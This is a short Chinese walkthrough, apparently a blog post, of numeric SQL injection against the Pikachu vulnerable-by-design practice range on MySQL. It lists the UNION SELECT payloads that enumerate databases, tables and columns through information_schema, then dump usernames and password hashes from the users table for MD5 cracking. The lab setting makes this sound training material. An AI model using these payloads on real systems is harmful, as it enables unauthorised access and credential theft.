SQL注入(pikachu靶场)(mysql数据库)数字型注入

1.数字型注入

点击查询(submit),用burpsuite抓取请求(request)包

SQL注入(pikachu靶场)(mysql数据库)数字型注入_第1张图片

order by 判断有几列

union select 1,2 判断回显

然后利用mysql高版本中的默认库(information_schema)进行所有的数据库名查询

union select 1,schema_name from information_schema.schemata

SQL注入(pikachu靶场)(mysql数据库)数字型注入_第2张图片

SQL注入(pikachu靶场)(mysql数据库)数字型注入_第3张图片

根据得到的数据库名查询数据库下的表名

union select 1,table_name  from information_schema.tables where table_schema='pikachu'

SQL注入(pikachu靶场)(mysql数据库)数字型注入_第4张图片

查询表名为users的所有列名

 union select 1,column_name  from information_schema.columns where table_name='users'

SQL注入(pikachu靶场)(mysql数据库)数字型注入_第5张图片

查看users表下的username,password

union select username,password  from users

SQL注入(pikachu靶场)(mysql数据库)数字型注入_第6张图片

进行MD5解密

SQL注入(pikachu靶场)(mysql数据库)数字型注入_第7张图片

你可能感兴趣的:(#,pikachu靶场(sql),数据库,sql,mysql)